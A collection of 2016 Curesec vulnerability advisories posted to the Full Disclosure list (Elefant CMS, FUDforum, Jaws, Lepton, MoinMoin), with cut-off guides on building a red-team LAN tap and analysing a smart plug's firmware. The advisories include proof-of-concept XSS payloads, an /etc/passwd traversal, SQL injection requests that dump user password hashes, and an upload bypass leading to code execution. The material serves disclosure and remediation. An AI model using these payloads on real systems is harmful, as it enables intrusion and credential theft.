Username To trigger the payload: 1. Log in as admin 2. View the edit page for the user, for example: http://localhost/user/edit?id=3 Alternatively, the payload is also echoed on the page listing all users: http://localhost/admin/versions?id=&type=User As well as on the version page: http://localhost/admin/versions?type=User&id=3 Persistent XSS: Version Comparison CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Various fields of various components are echoed unencoded when comparing versions of those components. Examples are the user profile fields Name, Address, Address 2, City, Title, Company, or About, or the Title, Menu Title, Window Title, Description, or Keyword of a page. Proof of Concept: The comparison page can for example be seen here: http://localhost/admin/ compare?id=8¤t=no Persistent XSS: Page & Content Block CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title of a new webpage is echoed unencoded, leading to persistent XSS. The same issue also exists when creating blocks. A user account with the right to create pages is required. By default, the editor role has this right. Proof of Concept: Create a new page or block, as title use: The payload will be echoed in a title tag as well as a h1 tag when viewing the page and when editing the page. Persistent XSS: Blog Post CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:N/I:P/A:N The title as well as the tags of a blog post are echoed unencoded, leading to persistent XSS. A user account with the right to create pages is required. By default, the editor role has this right Proof of Concept: Create a new blog post, as title and tag use: '"> The payload will be echoed in a title tag, a h1 tag, as well as a href tag when viewing the page and when editing the page. Reflected XSS CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N The name parameter of the custom fields component is vulnerable to reflected XSS. Proof of Concept: GET /admin/extended?extends=User&name=%3Cimg%20src=no%20onerror=alert(1)%3E HTTP/1.1 4. Solution To mitigate this issue please upgrade at least to version 1.3.13. Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue, Vendor announces fix 11/07/2016 Asked Vendor if recent releases fixes issues, Vendor confirmed 02/02/2017 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Elefant-CMS-1312-RC-Multiple-Persistent-and-Reflected-XSS-191.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Tap 'n' Sniff
Content Table 1. Introduction 2. Failsafe mode 3. Installing Openwrt 4. Configuring Openwrt 5. Testing 1. Introduction The goal of this guide is to provide a reliable and fast way for creating a lan tap for red team assessments of networks. While this was our main target this tap is also quite helpful if you want to have a great device for your daily analysis of network attached computers. Before we started with our implementation we made a list of things which were mandatory. The hardware had to be small, have at least two lan ports and wifi, cheap and opensource included or available. After some research we choose the TL-WR810N, a 20 euro Pocket Router which should be available in most electronic stores. It features two lan ports and a wifi card, which allows us to bridge the lan interfaces and create a hidden AP to connect to the device. It should be said that the device only supports Fastlan (100 Mbit/sec) and not Gigabit lan (1000 Mbit/sec) but at this size you can't be picky and it's quite difficult to find something better even online when ordering from a foreign country so there is that. After we are finished we want to be able to listen to the network traffic between the taped sources, manipulate packets or directly pivot into the network. For our setup we are going to use openwrt instead of the default TP-Link firmware. We are currently working on creating an image that will make the configuration of openwrt obsolete so stay tuned for info regarding this. And this is how it actually looks: [wr810n_front] [wr810n_back] [wr810n_ports] [wr810n_led_switch] On the inside we find a SoC (System on Chip), namely the Qualcomm Atheros QCA9533 which is capable of wireless ABGN communication and has a clock speed of 560 MHz according to wikidevi. There is also 64 MB of Ram and we can use 4.6 MB of flash storage with 1.1 still availiable after finishing this guide. Below is the output of cpuinfo, free and df. It is interesting that when we opened the device later on we actually found the cpu to be a different one, the Qualcom QCA9531-BL3A but apparently they are identical. Basic information found via commandline: root@OpenWrt:~# cat /proc/cpuinfo system type : Qualcomm Atheros QCA9533 ver 2 rev 0 machine : TP-LINK TL-WR810N processor : 0 cpu model : MIPS 24Kc V7.4 BogoMIPS : 432.53 wait instruction : yes microsecond timers : yes tlb_entries : 16 extra interrupt vector : yes hardware watchpoint : yes, count: 4, address/ irw mask: [0x0ffc, 0x0ffc, 0x0ffb, 0x0ffb] isa : mips1 mips2 mips32r1 mips32r2 ASEs implemented : mips16 shadow register sets : 1 kscratch registers : 0 package : 0 core : 0 VCED exceptions : not available VCEI exceptions : not available root@OpenWrt:~# free total used free shared buffers cached Mem: 60220 17032 43188 20 1504 4828 -/+ buffers/cache: 10700 49520 Swap: 0 0 0 root@OpenWrt:~# df -h -T Filesystem Type Size Used Available Use% Mounted on /dev/root squashfs 2.0M 2.0M 0 100% /rom tmpfs tmpfs 29.4M 20.0K 29.4M 0% /tmp /dev/mtdblock3 jffs2 4.6M 3.5M 1.1M 76% / overlay overlayfs:/overlay overlay 4.6M 3.5M 1.1M 76% / tmpfs tmpfs 512.0K 0 512.0K 0% /dev 2. Failsafe mode Before we begin you should know about the built-in failsafe mode of openwrt. This exists just in case you make a mistake and loose the connection to the router by something else than a reboot. It is activated by pressing the reset button rapidly on startup till the led blinks more frequently than usual. Now you have to give your ethernet interface an ip like 192.168.1.2 and connect to the WAN/LAN port. Then you should be able to ssh to 192.168.1.1 as root without password. In the ssh session you can mount the filesystem with mount_root and reverse the changes that made your system fail. If the worst-case scenario happens and you have no clue why your system behaves abnormal, you can always reinstall openwrt. To do so, we copy our image via scp in the tmp directory of the router: scp /path/to/image/ root@192.168.1.1:/tmp Now we use the sysupgrade command on the router to install the bin file: sysupgrade -n /tmp/binary The -n flag means that we also erase all config files. Don't worry if you loose the connection, first the router will reboot and then you have to switch your lan cable to the lan port again. 3. Installing Openwrt Installing openwrt is as easy as it gets, you just have to configure the router, preferrably by connecting via lan, using its webinterface and download the respective firmware image from the Openwrt wiki. We used the EU Version 1.1, also availible at our github(TODO) since we can't guarantee this procedure to work with other versions that might be published in the future. The easiest way to install openwrt is via the webinterface and its option Firmware-Upgrade. Íf, for whatever reason, this fails you can also install openwrt via the serial console or TFTP. A guide can be found at the wiki. After doing so, you will loose the connection to the ro
[FD] The HS-110 Smart Plug aka Projekt Kasa
Content Table 1. Introduction 2. The Firmware 3. The Android Application 4. The Problems 5. Conclusion 6. Appendix 6.1. Excursion Dalvik 6.2 Control script 1. Introduction The HS-110 is a Smart Plug meaning it is capable of being controlled with commands via a network. TP-Link released a mobile application called "Kasa for Mobile" for Android and iOS devices to control the Smart Plug. The possibilities range from simple tasks like turning the Plug on and off to advanced options like planing schedules and timers. The HS-110 additionally has the possibility to measure and store data regarding power consumption. These are screenshots of the app home screen, the main control and the settings for a plug: app control screen plug control screen plug settings The device itself is pretty straightforward with only two buttons. The one at the top is the reset button and the other one in the front is the power button and status led: plug from the front plug from the top plug from the back To open it we remove the hidden screw under the information sheet and then break it open using a little bit of force: [open1] [open2] Now we remove the top part of the board and the two screws on the second part to get rid of the plastic hull: [open3] [open4] [open5] We can now see the Atheros AR9331 (Hornet) on the right board in the middle picture above. It is a System-on-a-Chip (SOC) which has a MIPS 24K processor and is a full featured IEEE 802.11n 1x1 AP/Router. It also has a 32 MiB RAM (Zentel A3S56D40GTP-50l) on the opposite side of the same board. The other board hosts the electronics for the actual plug. But the interesting question is: What this SOC is actually running so let's move on to the next section. 2. The Firmware The Smart Plug runs on a 64-bit Linux (2.6.31). The Firmware is available at the Website of TP-Link. Our version is 1.0.7. There is also an unofficial unstable API on GitHub. For a first analysis of the Firmware we used binwalk . It is important to also install sasquatch for this since unsquashfs appears to have issues with TP-Link firmware. You can just install the necessary tools for the installation of sasquatch via apt sudo apt-get install build-essential liblzma-dev liblzo2-dev zlib1g-dev or the corresponding packages if you don't use apt. After that just clone the sasquatch git repository and run the build script. At the end we have to install binwalk by cloning it's git repository and running the setup.py script via sudo python setup.py install or sudo python3 setup.py install if you are using python3.x. For the dependencies we can run deps.sh, at least when we are using apt. Otherwise you have to install them by yourself. A list is available at github . Now we are ready to run binwalk at the firmware with following command: root@kali:~/Desktop/test# binwalk hs110v1_us_1.0.7_Build_151016_Rel.24186.bin DECIMAL HEXADECIMAL DESCRIPTION 15904 0x3E20 U-Boot version string, "U-Boot 1.1.4 (Oct 16 2015 - 11:22:22)" 15952 0x3E50 CRC32 polynomial table, big endian 17244 0x435C uImage header, header size: 64 bytes, header CRC: 0xA2B5F4E6, created: 2015-10-16 03:22:22, image size: 38777 bytes, Data Address: 0x8001, Entry Point: 0x8001, data CRC: 0xFED80D4A, OS: Linux, CPU: MIPS, image type: Firmware Image, compression type: lzma, image name: "u-boot image" 17308 0x439C LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 112564 bytes 66240 0x102C0 uImage header, header size: 64 bytes, header CRC: 0x4D2B83AC, created: 2015-10-16 03:22:56, image size: 772570 bytes, Data Address: 0x80002000, Entry Point: 0x8019BF90, data CRC: 0xC849B1ED, OS: Linux, CPU: MIPS, image type: OS Kernel Image, compression type: lzma, image name: "Linux Kernel Image" 66304 0x10300 LZMA compressed data, properties: 0x5D, dictionary size: 33554432 bytes, uncompressed size: 2238780 bytes 1114816 0x1102C0 Squashfs filesystem, little endian, version 4.0, compression:lzma, size: 2112689 bytes, 194 inodes, blocksize: 16384 bytes, created: 2015-10-16 03:25:36 It is the most basic command of binwalk and only tells it to analyze the specified file. As we can see binwalk detects quite a few things. First of all there is the U-Boot version string and -image header together with its lzma archive and the polynomial table. U-Boot is a common bootloader, as we can see it was created on October 16th 2015 at 11 o'clock but it is out of our scope to go through it. Next thing we notice is the Kernel header and archive which is a little bit more interesting but we are still looking for the actual system which is the last entry, the squashfs filesystem, compressed with lzma. Now we could extract the squashfs filesystem via dd but we can also modify our command with the argument -e to let binwalk do this. The e argument is the command to extract the firmware using predefined dd rules. The output should look like
[FD] FUDforum 3.0.6: LFI
Security Advisory - Curesec Research Team 1. Introduction Affected Product:FUDforum 3.0.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://fudforum.org/forum/ Vulnerability Type: LFI Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to local file inclusion. This allows an attacker to read arbitrary files that the web user has access to. Admin credentials are required. 3. Details CVSS: Medium 4.0 AV:N/AC:L/Au:S/C:P/I:N/A:N Description: The "file" parameter of the hlplist.php script is vulnerable to directory traversal, which allows the viewing of arbitrary files. Proof of Concept: http://localhost/fudforum/adm/hlplist.php?tname=default&tlang=./af&&SQ= 4b181ea1d2d40977c7ffddb8a48a4724&file=../../../../../../../../../../etc/passwd 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/FUDforum-306-LFI-167.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Jaws 1.1.1: Object Injection, Open Redirect, Cookie Flags
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:Jaws 1.1.1
Fixed in:not fixed
Fixed Version Link: n/a
Vendor Website: http://jaws-project.com/
Vulnerability Type: Object Injection, Open Redirect, Cookie Flags
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode:Full Disclosure
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Jaws is a content management system written in PHP. In version 1.1.1, it is
vulnerable to various low to medium impact issues. It contains an Object
Injection, which does not seem to be currently exploitable without custom
changes made by users; its session cookies are not set to httpOnly, which may
make it easier to exploit XSS issues; and it contains an Open Redirect issue.
3. Details
Open Redirect / Phishing
After a login is performed, a user is redirected to a website defined in the
URL, which may be exploited in phishing attacks.
Note that the redirect only works if the user was not logged in previously, and
then only after a login is performed.
Proof of Concept:
http://localhost/jaws-complete-1.1.1/index.php/users/login/referrer/
687474703a2f2f6578616d706c652e636f6d.html 687474703a2f2f6578616d706c652e636f6d
is the result of a hex2bin call.
Object Injection
All parameters passed to the application are passed to unserialize, making the
application vulnerable to Object Injection.
Currently, there does not seem to be code that can be exploited via Object
Injection, but this may change in the future, or users may have custom code
which isn't in itself vulnerable, but would result in vulnerable code in
combination with this issue.
Proof of Concept:
All values passed to the application are vulnerable, for example a cookie: GET
/jaws-complete-1.1.1/admin.php?checksess HTTP/1.1 Host: localhost
Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie:
JAWSSESSID=O:{}; Connection: close Cache-Control: max-age=0
Cookie Flags
The JAWSSESSID cookie does not have the httpOnly flag set, making it slightly
easier to exploit XSS vulnerabilities.
4. Solution
This issue was not fixed by the vendor.
5. Report Timeline
09/05/2016 Informed Vendor about Issue (no reply)
09/15/2016 Reminded Vendor of Disclosure Date (no reply)
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Jaws-111-Object-Injection-Open-Redirect-Cookie-Flags-168.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] FUDforum 3.0.6: Multiple Persistent XSS & Login CSRF
Security Advisory - Curesec Research Team 1. Introduction Affected Product:FUDforum 3.0.6 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://fudforum.org/forum/ Vulnerability Type: XSS, Login CSRF Remote Exploitable: Yes Reported to vendor: 04/11/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview FUDforum is forum software written in PHP. In version 3.0.6, it is vulnerable to multiple persistent XSS issues. This allows an attacker to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection. Additionally, FUDforum is vulnerable to Login-CSRF. 3. Details XSS 1: Via Filename in Private Message CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in private messages is vulnerable to persistent XSS. Proof of Concept: Send a PM to a user. Add an attachment, where the filename is: '">.jpg When the recipient views the PM, the injected code will be executed. XSS 2: Via Filename in Forum Posts CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: The filename of attached images in forum posts is vulnerable to persistent XSS. Proof of Concept: Create a new forum post. Add an attachment, where the filename is: '">.jpg When viewing the post the injected code will be executed. XSS 3: Via Signature in User Profile CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N Description: When editing a profile, the signature is echoed unencoded, leading to persistent XSS. Proof of Concept: Visit http://localhost/fudforum/index.php?t=register as signature, use '"> The injected code is either executed when the user themselves edits their profile - which may be exploited via login CSRF - or when an admin visits the edit profile page located here: http:// localhost/fudforum/index.php?t=register&mod_id=6&&SQ= 1a85a858f326ec6602cb6d78d698f60a Login CSRF CVSS: Low 2.6 AV:N/AC:H/Au:N/C:N/I:P/A:N Description: The login of FUDForum does not have any CSRF protection. The impact of this is low, but an attacker might get a victim to disclose sensitive information by using CSRF to log the victim into an attacker-controlled account. An example would be the accidental sending of a sensitive private message while being logged into an account controlled by an attacker. Additionally, Login-CSRF may enable an attacker to exploit XSS issues in the user area. Proof of Concept: http://localhost/fudforum/index.php?t=login"; method ="POST"> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 04/11/2016 Informed Vendor about Issue (no reply) 09/14/2016 Reminded Vendor (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/FUDforum-306-Multiple-Persistent-XSS-amp-Login-CSRF-169.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Jaws 1.1.1: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product:Jaws 1.1.1 Fixed in:not fixed Fixed Version Link: n/a Vendor Website: http://jaws-project.com/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to public: 11/10/2016 Release mode:Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Overview Jaws is a content management system written in PHP. In version 1.1.1, it is vulnerable to code execution as it allows the upload of files with a dangerous type. An account with extended privileges is required. 3. Details CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C The file manager forbids the uploading of most PHP and htaccess files by checking the extension of uploaded files and renaming files when required. However, the check can be bypassed by an attacker as the file extension .pht - which is treated as PHP file by default Apache installations - is not filtered. An account with access to the file manager is required. 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 09/05/2016 Informed Vendor about Issue (no reply) 09/15/2016 Reminded Vendor of Disclosure Date (no reply) 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Jaws-111-Code-Execution-170.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: Code Execution
Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://www.lepton-cms.org/posts/ important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability Type: Code Execution Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to code execution as it is possible to upload files with dangerous type via the media manager. 3. Details Upload of file with dangerous type CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C Description: When uploading a file in the media tab, there is a client-side as well as a server-side extension check. The server-side check can be bypassed by including a valid extension before the desired extension, leading to code execution or XSS. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/media/index.php?leptoken= 099c871bbf640f2f91d2az1472132032 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: lep9131sessionid= 8bgkd5rae5nhbn0jaac8jpkpc5 Connection: close Content-Type: multipart/form-data; boundary=---38397165016927337851258279296 Content-Length: 613 -38397165016927337851258279296 Content-Disposition: form-data; name="action" media_upload -38397165016927337851258279296 Content-Disposition: form-data; name="current_dir" -38397165016927337851258279296 Content-Disposition: form-data; name="upload[]"; filename="test.png.php5" Content-Type: image/png http://localhost/ LEPTON_stable_2.2.2/upload/media/test.png.php5?x=id 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-Code-Execution-171.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: CSRF, Open Redirect, Insecure Bruteforce Protection & Password Handling
Security Advisory - Curesec Research Team
1. Introduction
Affected Product: LEPTON 2.2.2 stable
Fixed in: 2.3.0
Fixed Version http://www.lepton-cms.org/posts/
Link: important-lepton-2.3.0-101.php
Vendor Website: http://www.lepton-cms.org/
Vulnerability CSRF, Open Redirect, Insecure Bruteforce Protection &
Type: Password Handling
RemoteYes
Exploitable:
Reported to 09/05/2016
vendor:
Disclosed to 11/10/2016
public:
Release mode: Coordinated Release
CVE: n/a
Credits Tim Coen of Curesec GmbH
2. Overview
Lepton is a content management system written in PHP. In version 2.2.2, it
contains various low to medium impact issues. The functionality that operates
on files and folders is vulnerable to CSRF which may lead to XSS, the logout is
vulnerable to Open Redirect, the in-build bruteforce protection can be easily
bypassed, and passwords are hashed with md5 and send out via email in
plaintext.
3. Details
CSRF
CVSS: Medium 4.0 AV:N/AC:H/Au:N/C:N/I:P/A:P
Description: All actions on folders and files are missing CSRF protection.
Because of this, an attacker can delete, create, or rename folders and files.
An attacker could for example create .html files which would lead to an XSS
attack.
Proof of Concept:
Delete Folder: http://localhost//
LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/tiny_mce/filemanager/execute.php?
action=delete_folder" method="POST"> Create File:
http://localhost//LEPTON_stable_2.2.2/upload/modules/tiny_mce_4/
tiny_mce/filemanager/execute.php?action=create_file" method="POST">
Open Redirect
CVSS: Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:NP
Description: The redirect parameter of the logout script is vulnerable to open
redirect.
Proof of Concept:
http://localhost/LEPTON_stable_2.2.2/upload/account/logout.php?redirect=http://
google.com
Insufficient Bruteforce Protection
Description: The bruteforce protection works on a per-session base, which is
easily bypassed by an attacker by simply requesting a new session by not
sending the current, locked session information. The current bruteforce
protection may provide a false sense of security and should thus be removed or
changed.
Code:
if($_SESSION['ATTEMPS'] > $this->max_attemps) { $this->warn(); }
Password Handling
The password reset functionality sends a newly generated password in plaintext
via email, which is not recommended.
Additionally, md5 is used for hashing, which is also not recommended.
4. Solution
To mitigate this issue please upgrade at least to version 2.3.0:
http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Informed Vendor about Issue
09/06/2016 Vendor requests 60 days to release fix
10/25/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/Lepton-222-CSRF-Open-Redirect-Insecure-Bruteforce-Protection-amp-Password-Handling-172.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Lepton 2.2.2: SQL Injection
Security Advisory - Curesec Research Team 1. Introduction Affected Product: LEPTON 2.2.2 stable Fixed in: 2.3.0 Fixed Version Link: http://www.lepton-cms.org/posts/ important-lepton-2.3.0-101.php Vendor Website: http://www.lepton-cms.org/ Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 09/05/2016 Disclosed to11/10/2016 public: Release mode: Coordinated Release CVE:n/a Credits Tim Coen of Curesec GmbH 2. Overview Lepton is a content management system written in PHP. In version 2.2.2, it is vulnerable to multiple SQL injections. The injections require a user account with elevated privileges. 3. Details SQL Injection: Search Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "terms" parameter of the page search is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/index.php?leptoken= 3f7020b05ec343675b6b2z1472137594 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=f3a67s8kh379l9bs2rkggtpt12 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 154 search_scope=title&terms=" union select username,2,3,4,5,6,password,email,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from lep_users -- -&search=Search Blind or Error-based SQL Injection: Create Page CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "parent" parameter of the create page functionality is vulnerable to SQL Injection. A user account with the right "Pages" is required to access this feature. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/pages/add.php?leptoken= dbbbe0a5cca5d279f7cd2z1472142328 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID= fkb7do1domiofuavvof5qbsv66; lep8765sessionid=uniltg734soq583l03clr0t6j0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 84 title=test&type=wysiwyg&parent=0 union select version()& visibility=public&submit=Add Blind or Error-based SQL Injection: Add Droplet CVSS: Medium 6.5 AV:N/AC:L/Au:S/C:P/I:P/A:P Description: The "Add_droplets" parameter of the droplet permission manager is vulnerable to SQL injection. A user account with access to the Droplets administration tool is required. The injection is blind or error based in the case that PHP is configured to show errors. Proof of Concept: POST /LEPTON_stable_2.2.2/upload/admins/admintools/tool.php?tool=droplets& leptoken=1eed21e683f216dbc9dc2z1472139075 HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=fkb7do1domiofuavvof5qbsv66; lep8765sessionid= f3a67s8kh379l9bs2rkggtpt12 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 277 tool= droplets&perms=1&Add_droplets%5B%5D=1&Add_droplets%5B%5D=2' WHERE attribute= 'Add_droplets' or extractvalue(1,version())%23&Delete_droplets%5B%5D=1& Export_droplets%5B%5D=1&Import_droplets%5B%5D=1&Manage_backups%5B%5D=1& Manage_perms%5B%5D=1&Modify_droplets%5B%5D=1&save=Save 4. Solution To mitigate this issue please upgrade at least to version 2.3.0: http://www.lepton-cms.org/posts/important-lepton-2.3.0-101.php Please note that a newer version might already be available. 5. Report Timeline 09/05/2016 Informed Vendor about Issue 09/06/2016 Vendor requests 60 days to release fix 10/25/2016 Vendor releases fix 11/10/2016 Disclosed to public Blog Reference: https://www.curesec.com/blog/article/blog/Lepton-222-SQL-Injection-173.html -- blog: https://www.curesec.com/blog tweet: https://twitter.com/curesec Curesec GmbH Curesec Research Team Josef-Orlopp-Straße 54 10365 Berlin, Germany ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MoinMoin 1.9.8: XSS
Security Advisory - Curesec Research Team
1. Introduction
Affected Product:MoinMoin 1.9.8
Fixed in:1.9.9
Fixed Version Link: http://static.moinmo.in/files/moin-1.9.9.tar.gz
Vendor Website: https://moinmo.in
Vulnerability Type: XSS
Remote Exploitable: Yes
Reported to vendor: 09/05/2016
Disclosed to public: 11/10/2016
Release mode:Coordinated Release
CVE: CVE-2016-7148, CVE-2016-7146
Credits Tim Coen of Curesec GmbH
2. Overview
MoinMoin is an open source Wiki application written in python. In version
1.9.8, it is vulnerable to two persistent XSS issues. This allows an attacker
to steal cookies, inject JavaScript keyloggers, or bypass CSRF protection.
3. Details
XSS 1: Persistent XSS (CVE-2016-7148)
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: A page name is echoed in the attach file page without encoding,
leading to persistent XSS.
Proof of Concept:
To place the payload create a new page which contains the payload as name by
visiting: http://localhost:9090/
newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=edit To
trigger the payload visit the attach file page: http://localhost:9090/
newtest%27%22%3E%3Cimg%20src%3Dno%20onerror%3Dalert%287%29%3E?action=AttachFile
Note that there must be at least one existing attachment.
XSS 2: Persistent XSS (CVE-2016-7146)
CVSS: Medium 5.0 AV:N/AC:L/Au:N/C:N/I:P/A:N
Description: The GUI editor is vulnerable to XSS via a specifically crafted
URL, as it echoes part of the URL without encoding in two different places. The
issue can be exploited reflected or persistent.
Proof of Concept:
Reflected example (the page does not have to exist): http://localhost:9090/'">
?action=fckdialog&dialog=attachment Alternatively,
an attacker can create a page containing the payload: http://localhost:9090/
newtestfoo'%22%3E%3Cimg%20src=no%20onerror=alert(1)%3E The payload is triggered
when attaching a file via the the GUI editor ("Edit (GUI)" -> "Attachment").
4. Solution
To mitigate this issue please upgrade at least to version 1.9.9:
http://static.moinmo.in/files/moin-1.9.9.tar.gz
Please note that a newer version might already be available.
5. Report Timeline
09/05/2016 Contacted Vendor, Vendor confirmed, Requested CVEs
09/06/2016 CVEs assigned and distributed to vendor
10/05/2016 Vendor requests more time
10/31/2016 Vendor releases fix
11/10/2016 Disclosed to public
Blog Reference:
https://www.curesec.com/blog/article/blog/MoinMoin-198-XSS-175.html
--
blog: https://www.curesec.com/blog
tweet: https://twitter.com/curesec
Curesec GmbH
Curesec Research Team
Josef-Orlopp-Straße 54
10365 Berlin, Germany
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] MyLittleForum 2.3.6.1: CSRF
